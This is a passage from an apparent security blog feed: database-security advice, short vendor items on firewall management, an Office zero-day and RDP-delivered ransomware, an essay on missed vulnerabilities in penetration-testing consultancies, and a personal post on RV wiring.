At-rest data encryption that is built into the database protects sensitive data against this type of scenario. Even if someone has the database file, if it were encrypted, the file would essentially be useless. An attacker would have to implement an advanced crypto attack which would take enormous resources and time to conduct and is, for all intents and purposes, impractical. Encryption is a no-brainer. Some organizations use disk-layer encryption, which is OK in the event of lost or stolen disk. However, if a database file is moved to an unencrypted volume, it is no longer protected. In-database encryption improves security because the security stays with the file regardless of where it’s moved or exported. The data remains encrypted and inaccessible without the proper encryption keys regardless of where the database file is moved.

Layer 4: Apply Database Administrative Controls
Even with administrative permissions to the database, the researcher should not have been able to access the sensitive data.
I’m not aware of similar capabilities outside of Oracle database, but Oracle Database Vault would have also prevented this breach by implementing access controls within the database. Database Vault effectively segregates roles (enforces Separation of Duties) so that even an attacker with DBA permissions and access to the database file and encryption keys cannot run queries against the sensitive application data within the database because their role does not allow it. This role-based access, enforced within the database, is an extremely effective control to avoid accidental access that may occur throughout the course of daily database administration.

Layer 5: Protect Data Within the Database
Even with full authorization to application data, highly sensitive fields should be protected within the database.
Assuming all of the other layers break down and you have full access to the unencrypted database file and credentials that are authorized to access the sensitive application data, certain highly sensitive fields should be protected via application-tier encryption. Social Security Numbers and Passwords, for example, shouldn’t be stored in plain text. By applying protection for these fields at the app layer, even fully authorized users wouldn’t have access. We all know that passwords should be hashed so that the password field is only useful to the individual user who enters their correct password. But other fields, like SSN, can be encrypted at the app layer to protect against accidental exposure (human error), intentional insider attack, or exposed credentials (perhaps via phishing attack).

Maybe the vendor didn’t follow the proper protocols instituted by the organization. Maybe they made a human error; we all make mistakes. But, that’s why a layered approach to database security is critical on any database instances where sensitive production data resides. Security protocols shouldn’t require humans to make the right decisions. They should apply security best practices by default and without option.

Assuming this was a non-production database, any sensitive data should have been fully masked/replaced before it was even made available. And, if it was a production DB, database encryption and access control protections that stay with the database during export or if the database file is moved away from an encrypted volume should have been applied. The data should have been protected before the vendor's analyst ever got his/her hands on it. Oracle Database Vault would have prevented even a DBA-type user from being able to access the sensitive user data that was exposed here. These are not new technologies; they’ve been around for many years with plentiful documentation and industry awareness.

Unfortunately, a few of the early comments I read on this particular event were declarations or warnings about how this proves that cloud is less secure than on-premises deployments. I don’t agree. Many cloud services are configured with security by default and offer far more protection than company-owned data centers. Companies should seek cloud services that enable security by default and that offer layered security controls; more security than their own data centers. It’s more than selecting the right Cloud Service Provider. You also need to choose the right service; one that matches the specific needs (including security needs) of your current project. The top CSPs offer multiple IaaS and/or PaaS options that may meet the basic project requirements. While cloud computing grew popular because it’s easy and low cost, ease-of-use and cost are not always the most important factors when choosing the right cloud service. When sensitive data is involved, security needs to be weighed heavily when making service decisions.

I'll leave you with this. Today's computing landscape is extremely complex and constantly changing. But security controls are evolving to address what has been called the extended enterprise (which includes cloud computing and user mobility among other characteristics). Don't leave security in the hands of humans. And apply security in layers to cover as many potential attack vectors as possible. Enable security by default and apply automated checks to ensure that security configuration guidelines are being followed.

Note: Some of the content above is based on my understanding of Oracle security products (encryption, masking, CASB, etc.) Specific techniques or advantages mentioned may not apply to other vendors’ similar solutions.

Fight firewall sprawl with AlgoSec, Tufin, Skybox suites

New and innovative security tools seem to be emerging all the time, but the frontline defense for just about every network in operation today remains the trusty firewall. They aren’t perfect, but if configured correctly and working as intended, firewalls can do a solid job of blocking threats from entering a network, while restricting unauthorized traffic from leaving.

The problem network administrators face is that as their networks grow, so do the number of firewalls. Large enterprises can find themselves with hundreds or thousands, a mix of old, new and next-gen models, probably from multiple vendors -- sometimes accidentally working against each other. For admins trying to configure firewall rules, the task can quickly become unmanageable.

To read this article in full, please click here

(Insider Story)

Acknowledgement of Attacks Leveraging Microsoft Zero-Day

FireEye recently detected malicious Microsoft Office RTF documents that leverage a previously undisclosed vulnerability. This vulnerability allows a malicious actor to execute a Visual Basic script when the user opens a document containing an embedded exploit. FireEye has observed several Office documents exploiting the vulnerability that download and execute malware payloads from different well-known malware families.

FireEye shared the details of the vulnerability with Microsoft and has been coordinating for several weeks public disclosure timed with the release of a patch by Microsoft to address the vulnerability. After recent public disclosure by another company, this blog serves to acknowledge FireEye’s awareness and coverage of these attacks.

FireEye email and network solutions detect the malicious documents as: Malware.Binary.Rtf.

Attack Scenario

The attack involves a threat actor emailing a Microsoft Word document to a targeted user with an embedded OLE2link object. When the user opens the document, winword.exe issues a HTTP request to a remote server to retrieve a malicious .hta file, which appears as a fake RTF file. The Microsoft HTA application loads and executes the malicious script. In both observed documents the malicious script terminated the winword.exe process, downloaded additional payload(s), and loaded a decoy document for the user to see. The original winword.exe process is terminated in order to hide a user prompt generated by the OLE2link.

The vulnerability is bypassing most mitigations; however, as noted above, FireEye email and network products detect the malicious documents. Microsoft Office users are recommended to apply the patch as soon as it is available. 

Acknowledgements

FLARE Team, FireEye Labs Team, FireEye iSIGHT Intelligence, and Microsoft Security Response Center (MSRC).

Smackdown: Office 365 vs. G Suite management

When you choose a productivity platform like Microsoft’s Office 365 or Google’s G Suite, the main focus is on the platform’s functionality: Does it do the job you need?

That’s of course critical, but once you choose a platform, you have to manage it. That’s why management capabilities should be part of your evaluation of a productivity and collaboration platform, not only its user-facing functionality.

You’ve come to the right place for that aspect of choosing between Office 365 and Google G Suite.

Admin console UI. Both the Office 365 and G Suite admin consoles are well designed, providing clean separation of management functions and clear settings labels, so you can quickly move to the settings you want and apply them.

To read this article in full, please click here

(Insider Story)

A User-Friendly Interface for Cyber-criminals

IMG-MC-wysiwye

Installing malware through Remote Desktop Protocol is a popular attack method used by many cyber-criminals. over the past few months Panda Security’s research facility PandaLabs, has analysed several attacks of this nature.

Once credentials are obtained through brute a force attack on the RDP, the cyber-criminals gain access to the company. Attackers simply execute the corresponding malware automatically to start the encryption.

wysiwye-530x483Recently however, PandaLabs has noticed more personalised attacks. Analysing this intrusion we see that the ransomware comes with its own interface, through which its can be configured according to the attackers preferences. Starting with details such as which email address will appear in the ransom note. This customised attack makes it possible to hand-pick the devices the hackers would like to action on.

Advanced attacks we continue to see in this environment require businesses to employ a corporate network security strategy. Preventing zero-day attacks from entering your network is essential, along with efforts to neutralise and block attacks.

Data collected from Panda clients in Europe indicated that Panda Adaptive Defense 360 (AD360) was able to detect and block this particular attack. Timely investment in prevention, detection and response technology, such as AD360 guarantees better protections against new age threats.

The post A User-Friendly Interface for Cyber-criminals appeared first on CyberSafety.co.za.

Handling Missed Vulnerabilities

(Originally posted at https://nvisium.com/blog/2017/04/05/handling-missed-vulnerabilities/.)

Robin "digininja" Wood wrote this interesting article about the impact of missing vulnerabilities during security assessments. He makes a lot of good points, and the reality is, it's something we all deal with. Robin talks about how missing a vulnerability can be the end of one's career, or at least a large step backward. While this is true, his article only addresses the impact at a micro level. I'd like to expand on that.

As the Managing Consultant of a growing Application Security Consulting practice, this issue takes on a much larger form. We are no longer talking about one person's career. We are talking about an entire organization on whom employees' livelihood rely. Missing a vulnerability at this level can have some major consequences that affect a lot more than the offending consultant.

But it's going to happen. It's not a matter of if, but when. So it's important to be prepared when something like this does happen. As someone that has put a good bit of thought into this issue due to my position at nVisium, I've compiled my thoughts on the issue from prevention to reaction. These thoughts cover various hypothetical examples, attempt to identify the root problem, and discuss solutions to help rectify the situation.

Scenarios

The most probable scenario that could lead to missed vulnerabilities is retesting an application that the same consultancy has tested previously. Most good consultancies understand that there is value in rotating consultants for portfolio clients, but there is also risk. No two consultants are the same. Strengths, weaknesses, techniques, and tool sets vary, and with that, the results of their respective assessments. While those that employ this technique see this as a benefit to the client, if the consultant that tested most recently finds something that existed for a previous test but was overlooked, the client is more than likely not going to be thrilled about it, especially if it was something simple. The spectrum of response here is large as there is a significant difference between missing something during a black box assessment that gets picked up by an SCA tool vs. missing something via black box assessment that results in a major breach, but none of the possible outcomes are desireable. This is the scenario that most often leads to the uncomfortable discussion of the client attempting to govern which consultant is allowed to work on their assessments moving forward. I've heard stories of this going as far as direct threats to end all future work unless the consultant was terminated from employment. I can't imagine this is a comfortable position to be in.

While not the most common, the most damaging scenario is when the security assessment is the first step in the implementation of a bug bounty program. If you think it is bad having one of your own consultants find something that another one of your consultants missed, imagine a client having to pay a bug bounty for a vanilla vulnerability that one of your consultants missed. These are resume generating events.

Framing the Problem

There are four main reasons for encountering these scenarios and others like them: time, effort, aptitude, and methodology. The TEAM acronym was a complete accident, but works out pretty darn perfectly.

Time

Time is the thing that most restricts security assessments, and is the biggest difference between testers and the threats they attempt to replicate. In most cases, testers don't have the same amount of time as the threat, so time becomes a variable that is considered with varying levels of information in an attempt to most accurately represent the threat in a reduced period of time. Let's face it. No one wants to pay enough to truly replicate the threat.

All of these variables come into play during a process called scoping. Scoping is an extremely important part of the assessment planning process, as it is a key component to providing consultants with enough time to complete an engagement. If a conslultant is given too little time, then corners are cut, full coverage is not achieved, and we've introduced an opportunity for inconsistency.

There are a lot of things to consider when scoping.

Higher level assets (senior consultants, etc.) are faster than lower level assets (junior consultants, etc.). Low level assets will have to conduct more research on tested components, tools, etc. in order to sufficiently do the job. In fact, so much of what testers do at every level is largely on-the-job self-training. I don't know about you, but I hire based on a candidate's capacity to learn over what they already know. However, there is always a learning curve that must be considered when scoping an engagement in order to ensure full coverage.

Threat replication is a different kind of test than bug hunting. Depending on what kind of consulting the tester specializes in, they're either threat focused, or vulnerablity focused. To be vulnerablity focused is to focus on finding every possible vulnerability in a target. To be threat focused is to focus on replicating a very specific threat and only try to find what is needed to accomplish the determined goal of the replicated threat. The focus obviously has a huge impact on the amount of time required to complete the engagement, and the accuracy at which one can scope the engagement. When focusing on bugs, there are static metrics that can be analyzed to determine the size of the target: lines of code, dynamic pages, APIs, etc. Threat focused testing is much more subjective, as until you encounter something that gets you to the next level, you don't know how long it's going to take to get there.

Budget is often the most important factor in scoping, even though in many cases it is an unknown to the person doing the scoping. Quite often, a client's eyes are bigger than their wallet, and once they get a quote, they begin discussing ways to reduce the price of the engagement. While this is perfectly fine, and most of us would do it if we were in their shoes as well, consultancies have to be very careful not to obligate themselves to a full coverage assessment in a time frame that is unrealistic.

When cost isn't the determining factor that leads to over-obligation, it's client deadlines. You want to help your client, but they need it done by next week and it's easily a three week engagement. Be careful of this pitfall. There are solutions to helping the client without introducing opportunities for inconsistency. Keep reading.

The bottom line is, the consultant performing the engagement must have enough time to complete it in accordance with the terms of the contract. If the contract says "best effort", then pretty much any level of completion meets the standard. Otherwise, the expectation is full coverage for the identified components. Without enough time, you can be sure some other consultant, internal or extenal, is going to eventually follow up with a full coverage assessment that find something the previous consultant missed.

Addressing the "time" problem begins with refining the scoping process. This requires good feedback from consultants and tracking. Consultancies need to know when something is underscoped, overscoped, and why, and the only way to do this is to gather metrics about the timing of engagements from raw data sources, and from the consultants doing the work. When client budget is affecting the scope, consider recommending a "best effort" engagement, or an assessment that focuses on the specific components that are most important to the client. If a client has a hard deadline, consider leveraging more resources over a shorter period of time in order to meet their goal. There are always options, but the bottom line is to prevent the possibility of inconsistencies by making sure consultants have adequate time to meet contract requirments.

Effort

Effort is a personal responsibility. If a consultant doesn't put in the expected quantity of work to complete the job as scoped, but bills for the same, then not only will this introduce the opportunity for inconsistency, but the consultant is essentially stealing from the client on behalf of the consultancy. This is a serious offense with no easy solution. So much of what indicates a person's sustained level of effort comes from maturity and work ethic. Identifying these is something consultancies should do during the candidacy stage of the employment process.

Another aspect of effort is how consultants approach deliverables. It's no secret. Most consultants don't enjoy writing deliverables. Regardless, deliverables are the one thing left with the client when the consultant finishes an engagement. It provides the lasting impression that the client will have of the consultant, and more importantly, the consultancy. However, every so often consultants take shortcuts to reduce the time it takes to create a deliverable. This always leads to lower quality product and opportunities for inconsistency. Consultants must assume that the next consultant to see this target is going to put the requisite effort into the deliverable. The bottom line is, report everything. Whether the consultant uses paragraphs, bullets, or tables, if they discovered 30 instances of XSS, they need to report all 30 of them in the deliverable. They shouldn't just say, "We determined this to be systemic, so fix everywhere." This is poor quality consulting. It's ok to say things are systemic and that there may be other instances not found for one reason or another, but if the consultant found 30 instances, they need to pass that information to the client. They paid for it. Another common deliverable shortcut is grouping vulnerabilities by type without proper delineation. User Enumeration in a login page is very different from User Enumeration in a registration page, and recommendations for how to remediate these issues are completely different. If a consultant lumps all instances of User Enumeration into one issue and doesn't clearly delineate between the specific issues, then the consultant isn't putting in the required level of effort to prevent inconsistencies with future engagements.

Effort isn't an issue that can be addressed through administrative or technical controls. Effort comes from who someone is, their work ethic, and their level of passion toward the task at hand. Unfortunately, passion and work ethic isn't something that can be taught at this point in life, and if this is the issue, then the only option may be parting ways. This is why it is important to have a good vetting process for employment candidates to ensure that candidates exhibit the qualities indicative of someone who will provide the level of effort desired.

Aptitude

A lack of aptitude is often mistaken for a lack of effort. The reality is that some people are just more gifted than others, and all consultants can't be held to the same standard. While certainly not always the case, skill level is quite often related to the quantity of experience in the field. It's why we have Junior, Mid-level, Senior, and Principal level consultants. As mentioned previously, a Junior consultant cannot be expected to accomplish as much as a Senior consultant in the same amount of time. The Junior will require more time to research the target components, tools, techniques, etc. required to successfully complete the engagement. While this is a scoping consideration, it's also a staffing consideration. There is a higher margin on low level consultants. They cost less per hour, so they are more profitable on an hourly basis when the rate charged to the client is the same as a consultant senior to them. A stable of capable Junior consultants can be quite profitable, but can also introduce inconsistency.

Depending on the consultancy's strategic vision, there are a couple of approaches to solving the issue of aptitude. Many consultancies will try to avoid the issue all together by employing nothing but Senior level consultants or above. This is typical in small organizations with a high operational tempo and not enough resources to develop Junior consultants. These consultancies are basically throwing money at the problem. Their margin will be much lower, but they'll be able to maintain a higher operational tempo and incur less risk to testing inconsistencies related to skill. Another approach is a program to develop Junior consultants in an effort to increase margin and reduce the risk to testing inconsistencies over time. A great way to approach Junior consultant development is by pairing them up with consultants senior to them on every engagement. That way, they'll have constant leadership and someone they can lean on for mentorship on a constant basis. This allows the consultancy to get through engagements in a shorter time span due to having multiple assets assigned, but the scope of the project should consider the learning curve of the Junior consultant. In many cases, the increased speed of the senior asset will counter the slower speed of the junior asset, reducing the impact on the scoping process.

Regardless of the approach, consultancies should empower their consultants to cross train and knowledge share on a constant basis. Something we've done at nVisium is to conduct bi-monthly lunch-and-learns. These are informal presentations of something related to the field from one consultant to the rest of the team. This serves two purposes. For senior consultants, it is an opportunity to share something new or unknown to junior level consultants. For junior consultants, it is an opportunity to professionally develop on a consistent basis, as each consultant rotates through. An added benefit for juniors is that there are few things that motivate someone to become a subject matter expert on a topic more than committing to presenting on that topic to a group of their peers. It is surprisingly affective, and the reason I write articles and present at conferences to this day.

Another thing we do at nVisium is cultivate a highly collaborative environment via tools like Slack. So much so, that rarely does it feel like consultants are working on engagements alone. It is quite common to see code snippets and theory being tossed around and more than a handful of people sharing ideas about something encountered on an app only one of them is assigned to. This hive mind approach is not only highly affective in finding the best way forward for specific issues, but provides a great opportunity for Junior consultants to ask questions, receive clarification, and learn from their peers. It also attacks consistency at it's core as these events usually result in a public determination of where the organization stands on the issue and becomes an established standard moving forward. Everyone is involved, so everyone is aware.

Methodology

This is where I see consultants at all levels mess up more than anywhere else. Everyone thinks they're too good for methodology until someone else finds something new while following the methodology on the same application. The testing methodologies we use in Information Security today are proven. They work by laying the framework to maximize the time given to accomplish the task while providing a baseline level of analysis. I've seen consultants blow off methodology and one of two things happens: they spend all their time chasing phantom vulnerabilities (also known as "rabbit holes" and "red herrings") and fail to make full coverage, or think they have full coverage only to realize they missed multiple vanilla vulnerabilites when someone else tested the same target at a later time. In either case, an opportunity for inconsistency is introduced because it's is not a matter of if someone will follow with proper methodology, it's a matter of when.

Addressing this is about finding a balance between controlling the assessment process and allowing testers to exercise creative freedom. I am a firm believer in not forcing consultants to test in a confined environment by requiring them to use a checklist. Many of today's most critical vulnerabilities exist in business logic. Discovering vulnerabilities in how the application enforces logical controls to business processes requires a creative approach. Forcing consultants to use a checklist robs them of their creativity, reducing the likelihood of them actually testing outside of the items on the checklist. Since logic vulnerabilities are specific to the business process, they can't be checklist items. So while checklist testing is a good way to ensure a higher level of consistency, it leads to a consistent product lacking quality and completeness.

At nVisium we've developed what we call a "testing guide." What makes our guide different from a checklist is that the guide is merely a series of questions about the application. How testers answer the questions is up to them. They can use their own techniques and their own tool set. The idea is that through answering each of the questions within the guide, the tester will have exercised the application in its entirety and maximized the likelihood of identiying all vulnerabilities. Including business logic flaws. This guide is not a deliverable, and it's not something that supervisors check for. It's a tool at the disposal of the consultant, and each consultant knows that the others are using it, so the system is self-policing.

The Inevitable

Even with all of this in place, someone is going to miss something. And when they do, the organization must conduct damage control. Damage control measures are largely going determined by how the client reacts to the issue. It is purely reactionary at this point by all parties. However, thinking through possible scenarios as a staff and "wargaming" these situations will better prepare the team for the inevitable.

I'm a firm believe in owning your mistakes. I have way more respect for people that make mistakes and own them, than I do for folks that claim they never make any mistakes. Do you know what you call someone that never seems to be at fault for anything because they don't make mistakes? Dishonest. These individuals and the organizations they represent are immediately tagged as untrustworthy. We're in an industry where trust is the cornerstone of everything we do. Our clients entrust us with their intellectual property; the heart and soul of their businesses. Their livelihood. If we can't be trusted, we won't stay in business very long. Organizations and individuals alike must own their mistakes.

After owning the mistake, the organization needs to make it right. Once again, this depends on what the issue is, but remember that the issue is not in a vacuum. So someone missed a small issue during a small assessment for a small client. One might feel inclined to let it go. Don't forget that our industry is small, and word travels fast. There's far too much risk in not doing the right thing here folks.

The organization must accept the fact that sometimes making it right won't be enough. Clients pay consultancies a lot of money and expect a quality product. If the consultancy fails to deliver, the client has every right to find someone else that will, and the consultancy shouldn't be surprised if they do. In a perfect world, clients would understand our line of work and the difficulty in ensuring 100% consistency, but you don't need me to tell you this isn't a perfect world.

Wrapping Up

So it's going to happen, and someone is going to be dealing with the fallout. Chances are it won't be comfortable, but if the organization has implemented controls to reduce the frequency, and prepared themselves for occassions where the controls fail, they'll be equipped and prepared to limit the damage and ultimately live to test another day.

Doing it wrong, or “us and them”

I was arguing with the wiring in a little RV over the weekend and it was the typical RV  mix of automotive wiring, household wiring, and What The Expletive wiring. I fell back to my auto mechanic days and set about chasing the demons through the wires. Basic diagnostics: separate, isolate, test, reconnect, retest, repeat, until a path becomes clear. In this quest I used an old trick of mine (although I assume many other have used it) in using crimp connectors the “wrong” way. This made me think of being called out for it many years ago, “you’re doing it wrong you idiot!” or something like that. I tried  to explain that I was just using the common butt connectors in a different way for a different situation, but he wouldn’t hear of it. “That’s not how you use them” was the answer.

This was long before my computer and hacker days, but the mindset is there in many car guys. “You’re not supposed to do that” is a warning to most, but an invitation to many of us.

I hate to say we can’t teach that, but with a lot of folks you either have that curiosity or you don’t. I do think a lot more folks have that kind of innate curiosity and desire to test boundaries, but sadly our modern education systems can’t handle those characteristics in kids- “do it our way or you are wrong” is great for standardized testing, but terrible for education. And in our little world of cyberthings we really need curious people, people who ask questions like

Why?

Why not?

What if?

Hold my beer…

OK, the last wasn’t a question, but a statement of willingness to try.

I don’t have the answer, but I have seen a lot of little things which help- hackerspaces, makerspaces, good STEM/STEAM programs, and youth programs at hacker/security cons are great steps, but I fear that these only serve to minimize the damage done by the state of education in the US lately.

So yeah, I guess I’m just complaining. Again.

Oh, and about using the connectors wrong, normally you put one stripped end of a wire in each end of the connector and create an inline splice. For problem situations I connect wires as shown in the image. This provides a good connection, arguably better than the inline method since the wires are directly touching, but more importantly the open ends of the connectors are shielded to prevent accidental contact, but open to provide handy test points as you chase the demons through the wires. Which reminds me of another story, but that’s one for the barstool…

Wrong

Jack